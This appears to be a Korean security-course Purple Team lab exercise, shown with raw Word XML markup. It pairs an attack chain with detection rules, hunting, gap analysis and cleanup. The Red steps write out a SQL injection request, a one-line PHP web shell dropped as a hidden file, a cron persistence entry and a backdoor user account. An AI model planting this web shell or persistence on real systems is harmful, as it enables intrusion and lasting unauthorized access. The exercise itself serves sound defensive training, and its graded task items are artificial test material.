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[SOC고급 W13] Purple Team — ATT&amp;CK 공격 체인 vs 단계별 탐지 검증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soc-adv  ·  난이도 hard  ·  유형 1v1  ·  제한 50분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SOC 고급과정 13주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Purple Team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Red(공격)와 Blue(방어)가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>협업</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>해 "우리 탐지가 실제로 작동하는가"를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>단계별로 검증하고 즉시 개선한다. 이 주차는 본래부터 공격과 방어의 통합이라 공방전 형식과 가장 잘 맞는다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>공격자는 ATT&amp;CK 다단계 체인을 실행하고, 관제팀(너)은 각 단계의 탐지 성공/실패를 매트릭스로 정리하고 갭을 메운다.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>공격자가 Initial Access(SQLi→웹쉘) → Persistence(cron+계정) 체인을 실행한다. 관제팀은 ① 웹공격 단계</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Suricata 탐지, ② 지속성 단계 Wazuh 탐지를 배포하고, ③ 실제로 각 단계 흔적을 탐지·검증하고, ④ 단계별</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>탐지 매트릭스와 갭 분석을, ⑤ Purple Team 성과지표·Navigator·종합 보고로 마무리한다.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Red 체인 실행 후 Blue 탐지 검증.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체인을 실행, Blue 는 자기 인프라에서 단계별 탐지.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`sa13r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/www/html/.sa13shell.php`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, cron 지속성 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/etc/cron.d/sa13persist`</w:t>
      </w:r>
      <w:r>
        <w:br/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sa13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`soca13`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, Suricata 룰 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9613131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, Wazuh 룰 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 102131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[Initial Access → Execution] — SQLi 후 웹쉘 확보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Purple Team 체인의 1·2단계다. 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa13r1-&lt;본인id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi 로 침투하고, 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/www/html/.sa13shell.php`</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>로 실행 발판을 확보한다. Blue 가 각 단계를 탐지하는지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VM(192.168.0.202) → 발판 후)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curl -s -A "sqlmap/1.7" -H "Host: dvwa.el34.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=sa13r1-kim%27%20UNION%20SELECT%201--+&amp;Submit=Submit"</w:t>
        <w:br/>
        <w:t>cat &gt; /var/www/html/.sa13shell.php &lt;&lt;'PHP'</w:t>
        <w:br/>
        <w:t>&lt;?php /* sa13 */ system($_POST['c'] ?? ''); ?&gt;</w:t>
        <w:br/>
        <w:t>PHP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sa13r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 남고, 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa13shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가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sa13r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 탐지가 있거나 웹쉘 파일이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17점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[Persistence] — cron + 계정으로 지속성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체인의 3단계(Persistence)다. cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/etc/cron.d/sa13persist`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 와 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`soca13`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 으로 재부팅 생존</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>발판을 만든다. Blue 의 지속성 탐지가 작동하는지 확인한다.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echo '*/10 * * * * root /bin/bash -c "id # sa13" &gt;/dev/null 2&gt;&amp;1' | sudo tee /etc/cron.d/sa13persist</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash soca13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/etc/cron.d/sa13persist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sa13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">)가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soca13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/etc/cron.d/sa13persist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sa13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">)가 존재하거나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soca13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이 있다.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16점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[단계 탐지: 웹공격] — Suricata 룰 (sid 9613131)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Purple Team 은 "각 단계가 탐지되는가"를 검증한다. RED-1 의 웹공격 단계를 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9613131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(msg:"SOCADV-W13 purple SQLi UNION"; flow:to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; sid:9613131;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9613131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웹공격 단계를 보는 sid 9613131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15점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[단계 탐지: 지속성] — Wazuh 룰 (id 102131)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지속성 단계를 잡는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 102131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name="edu,purple,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="102131" level="12"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;cron.d&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;SOCADV-W13 - purple team persistence stage detection&lt;/description&gt;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102131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지속성 단계를 보는 id 102131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[탐지 검증] — 각 단계 흔적 실제 확인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Purple Team 의 핵심은 "탐지가 실제로 됐는지"를 검증하는 것이다. RED 가 남긴 웹쉘(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa13shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)과</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>cron 지속성(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/cron.d/sa13persist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)을 실제로 찾아 단계별 탐지 성공/실패를 확정하고 제거한다.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ls -al /var/www/html/.sa13shell.php 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>cat /etc/cron.d/sa13persist 2&gt;/dev/null ; sudo getent passwd | grep soca13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>보고서에 단계별(탐지됨/미탐) + "발견 → 제거" 로 적는다.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대상 호스트에서 웹쉘 또는 cron 지속성이 헌팅되는지로 채점(발견이 핵심).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웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa13shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 또는 cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/cron.d/sa13persist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 식별한다(식별 후 제거 보고).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BLUE-4 [탐지 매트릭스·갭 분석] — Navigator 시각화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Purple Team 의 산출은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>탐지 매트릭스</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>다. 공격 단계(Initial Access/Execution/Persistence/Lateral/Exfil)별로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>탐지 성공/실패와 기여 도구(Wazuh/Suricata/WAF)를 정리하고, 미탐 단계의 근본 원인(데이터소스/룰 부재/우회)을 분석한다.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단계 × 도구 탐지 매트릭스(✓/✗ + 어떤 룰이 기여했는지)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갭 분석: 미탐 단계의 근본 원인 + 개선 룰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ATT&amp;CK Navigator layer 개념(탐지=초록/미탐=빨강)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탐지 매트릭스/갭 분석으로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단계별 탐지 매트릭스·갭 분석·Navigator 개념은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19점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BLUE-5 [종합·Cleanup] — 성과 지표 + 프로그램 + 위생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Purple Team 의 산출물이다. 연습 전후 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>탐지 커버리지/MTTD/신규 룰 수</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>를 정량화하고, 분기별 Purple Team</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>프로그램</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(일정/시나리오/역할)을 설계하고, R/B/P 회고 후 아티팩트를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>일괄 cleanup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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성과 지표(커버리지 전후 + MTTD + 신규 룰 수) + 분기별 프로그램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cleanup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sudo rm -f /var/www/html/.sa13shell.php /etc/cron.d/sa13persist; sudo userdel -r soca13 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>sudo sed -i '/9613131/d' /etc/suricata/rules/local.rules &amp;&amp; sudo suricatasc -c reload-rules</w:t>
        <w:br/>
        <w:t># local_rules.xml 에서 102131 블록 제거 후 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성과 지표/프로그램/회고/cleanup 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성과 지표·프로그램·회고·cleanup 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